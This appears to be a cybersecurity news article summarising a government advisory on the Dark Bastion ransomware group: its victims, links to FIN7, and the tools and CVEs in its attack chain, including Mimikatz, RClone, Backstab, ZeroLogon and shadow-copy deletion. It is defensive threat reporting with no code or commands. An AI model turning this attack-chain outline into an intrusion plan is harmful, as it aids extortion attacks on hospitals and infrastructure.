The Dark Bastion ransomware-as-a-service (RaaS) operation has targeted over 500 private industry and critical infrastructure entities in North America, Europe, and Australia since its emergence in April 2022.
In a collaborative advisory published by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), the agencies stated that the threat actors encrypted and stole data from at least 12 out of 16 critical infrastructure sectors.
"Dark Bastion affiliates utilize common initial access techniques, such as phishing and exploiting known vulnerabilities, before implementing a dual-extortion model, encrypting systems, and exfiltrating data," the bulletin read.
In contrast to other ransomware groups, the ransom notes delivered at the end of the attack do not contain an initial ransom demand or payment instructions. Instead, the notes provide victims with a unique code and instruct them to contact the gang via a .onion URL.
Dark Bastion was initially observed in April 2022 using QakBot as an initial vector and has remained a highly active ransomware actor since then.
Statistics gathered by Malwarebytes indicate that the group has been linked to 28 out of the 373 confirmed ransomware attacks that occurred in April 2024. According to Kaspersky, it was the 12th most active family in 2023. Dark Bastion has also seen an uptick in activity in Q1 2024, increasing by 41% quarter-over-quarter.
There is evidence suggesting that the Dark Bastion operators have connections to another cybercrime group known as FIN7, which has transitioned to conducting ransomware attacks since 2020.
Attack chains involving the ransomware have relied on tools such as SoftPerfect network scanner for network scanning, BITSAdmin, Cobalt Strike beacons, ConnectWise ScreenConnect, and PsExec for lateral movement, Mimikatz for privilege escalation, and RClone for data exfiltration prior to encryption.
Other methods used to gain elevated privileges include the exploitation of security flaws such as ZeroLogon (CVE-2020-1472), NoPac (CVE-2021-42278 and CVE-2021-42287), and PrintNightmare (CVE-2021-34527).
In some cases, the deployment of a tool called Backstab to disable endpoint detection and response (EDR) software has been observed. It is worth noting that Backstab has also been utilized by LockBit affiliates previously.
The final step involves file encryption using a ChaCha20 algorithm with an RSA-4096 public key, preceded by the deletion of volume shadow copies via the vssadmin.exe program to hinder system recovery.
"Healthcare organizations are appealing targets for cybercrime actors due to their scale, reliance on technology, access to personal health information, and unique challenges from disruptions to patient care," the agencies stated.
These developments coincide with a CACTUS ransomware campaign that continues to exploit security flaws in a cloud analytics and business intelligence platform called Qlik Sense to gain initial access to target environments.
A recent analysis by NCC Group's Fox-IT team has revealed that 3,143 servers are still vulnerable to CVE-2023-48365 (also known as DoubleQlik), with the majority located in the U.S., Italy, Brazil, the Netherlands, and Germany as of April 17, 2024.
The ransomware landscape is evolving, with an 18% decrease in activity in Q1 2024 compared to the previous quarter, primarily driven by law enforcement operations against ALPHV (also known as BlackCat) and LockBit.
With LockBit experiencing significant reputational damage among affiliates, it is speculated that the group will likely attempt to rebrand. "The DarkVault ransomware group is a potential successor to LockBit," cybersecurity firm ReliaQuest noted, citing similarities in branding with LockBit.
